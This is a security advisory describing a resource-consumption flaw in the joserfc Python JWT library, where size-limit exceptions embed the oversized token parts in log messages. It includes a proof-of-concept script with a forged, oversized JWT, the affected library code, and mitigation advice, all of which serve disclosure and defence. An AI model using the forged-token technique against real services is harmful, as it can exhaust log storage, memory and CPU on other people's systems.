joserfc has a potential Uncontrolled Resource Consumption vulnerability triggered by logging arbitrarily large JWT token payloads
Vulnerability details
Summary
The ExceededSizeError exception message embeds the undecoded JWT token part, which can cause Python logging to record arbitrarily large, forged JWT payloads.
Details
When no production-grade web server is configured in front of the application, or one is missing entirely, an attacker may be able to send an arbitrarily large bearer token in an HTTP request header. When that happens, Python logging or diagnostic tools (such as Sentry) may end up processing an extremely large log message containing the full JWT header during the joserfc.jwt.decode() operation. The same behaviour occurs when validating the claims and signature payload sizes, because the library raises a joserfc.errors.ExceededSizeError() whose exception message embeds the full payload. Since the payload has already been fully loaded into memory at that point, the library itself cannot prevent or reject it.
Responsibility for enforcing request header size limits therefore lies with the underlying web server (uvicorn/h11, gunicorn, Starlette, Werkzeug, nginx, etc.). For example, a FastAPI/Starlette application that is not running behind uvicorn and/or gunicorn cannot enforce a request header size limit on its own. With uvicorn/h11, the --h11-max-incomplete-event-size option can limit the combined size of request headers and body, but not the headers alone. Likewise, vLLM, because it depends on uvicorn/h11 and because machine learning inference workloads require large data transfers, sets the combined header-and-body limit to 4 MB by default, and this limit is frequently raised. In practice, a robust reverse proxy such as nginx is usually required, because it can explicitly limit the maximum request header size. Unfortunately, many web applications are not deployed behind a suitable reverse proxy.
Given these constraints, the joserfc library cannot safely log or embed payloads of arbitrary size. The issue is particularly insidious because it only occurs when a maliciously crafted JWT actually reaches the Python application, something most developers never encounter in routine development and testing.
Proof of Concept (PoC)
Environment
- Ubuntu 24.04 LTS
- Python 3.12
- Tested on joserfc version 1.4.1
```python
import logging
from datetime import UTC, datetime, timedelta
from joserfc import jwt
from joserfc.errors import ExceededSizeError, UnsupportedAlgorithmError
from joserfc.jwk import OctKey

logger = logging.getLogger(__name__)

SECRET_KEY = "8c13bd66babc241b29f8553429bdab7deb6f5b74ddfda7765471e57ecd55641e"
LONG_JWT_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGQifQ"
    "."
    "eyJpc3MiOiJhdXRoX3NlcnZlciIsImlhdCI6MTc2MzI0OTEwMSwiZXhwIjoxNzY5MjQ5MTAxfQ"
    "."
    "6-k2jmkGXD6wXOgYgjPS8E5lS_GjWpgIuY54gokjAn8"
)
HEADER = {
    "alg": (
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
        "RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
    ),
}
CLAIMS = {
    "iss": "auth_server",
    "iat": datetime.now(UTC),
    "exp": datetime.now(UTC) + timedelta(minutes=15),
}


def main():
    # Create an OctKey from SECRET_KEY
    key = OctKey.import_key(SECRET_KEY)
    # Simulate creating a very large JWT
    # (this fails because of the invalid 'alg' header content and raises joserfc.errors.UnsupportedAlgorithmError)
    try:
        token = jwt.encode(HEADER, CLAIMS, key)
    except UnsupportedAlgorithmError:
        # Use a forged token with the same header and claims but an invalid signature
        token = LONG_JWT_TOKEN
    logger.warning(f"Created JWT: {token}")
    # Now try to decode the large JWT
    try:
        decoded_token = jwt.decode(token, key)
        logger.warning("This line will never be reached.")
        logger.warning(decoded_token.claims)
    except ExceededSizeError:
        logger.exception(
            "The JWT size is too large and may be a security attack attempt."
        )
        # The whole header content is being logged here inside the exception message!


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    main()
```
Code location
This behaviour appears in:
joserfc/_rfc7515/registry.py
L102-112
```python
    def validate_header_size(self, header: bytes) -> None:
        if header and len(header) > self.max_header_length:
            raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max_header_length} bytes.")

    def validate_payload_size(self, payload: bytes) -> None:
        if payload and len(payload) > self.max_payload_length:
            raise ExceededSizeError(f"Payload size of '{payload!r}' exceeds {self.max_payload_length} bytes.")

    def validate_signature_size(self, signature: bytes) -> None:
        if len(signature) > self.max_signature_length:
            raise ExceededSizeError(f"Signature of '{signature!r}' exceeds {self.max_signature_length} bytes.")
```
joserfc/_rfc7516/registry.py
L103-123
```python
    def validate_protected_header_size(self, header: bytes) -> None:
        if header and len(header) > self.max_protected_header_length:
            raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max_protected_header_length} bytes.")

    def validate_encrypted_key_size(self, ek: bytes) -> None:
        if ek and len(ek) > self.max_encrypted_key_length:
            raise ExceededSizeError(f"Encrypted key size of '{ek!r}' exceeds {self.max_encrypted_key_length} bytes.")

    def validate_initialization_vector_size(self, iv: bytes) -> None:
        if iv and len(iv) > self.max_initialization_vector_length:
            raise ExceededSizeError(
                f"Initialization vector size of '{iv!r}' exceeds {self.max_initialization_vector_length} bytes."
            )

    def validate_ciphertext_size(self, ciphertext: bytes) -> None:
        if ciphertext and len(ciphertext) > self.max_ciphertext_length:
            raise ExceededSizeError(f"Ciphertext size of '{ciphertext!r}' exceeds {self.max_ciphertext_length} bytes.")

    def validate_auth_tag_size(self, tag: bytes) -> None:
        if tag and len(tag) > self.max_auth_tag_length:
            raise ExceededSizeError(f"Auth tag size of '{tag!r}' exceeds {self.max_auth_tag_length} bytes.")
```
The other ExceededSizeError raised in joserfc/_rfc7518/jwe_zips.py is not affected by this issue, because it does not include the payload content in the exception message.
Impact
In scenarios where the web application does not reject oversized HTTP request header payloads, using joserfc may expose the system to "Allocation of Resources Without Limits or Throttling (CWE-770)", potentially affecting disk, memory and CPU on the application host as well as any external log storage, ingestion pipelines or alerting services. This risk can be reduced by removing the JWT payload from the affected joserfc.errors.ExceededSizeError() exception messages. It would also help to recommend in the documentation that the library be deployed behind a robust web server or reverse proxy that correctly enforces a maximum request header size.
References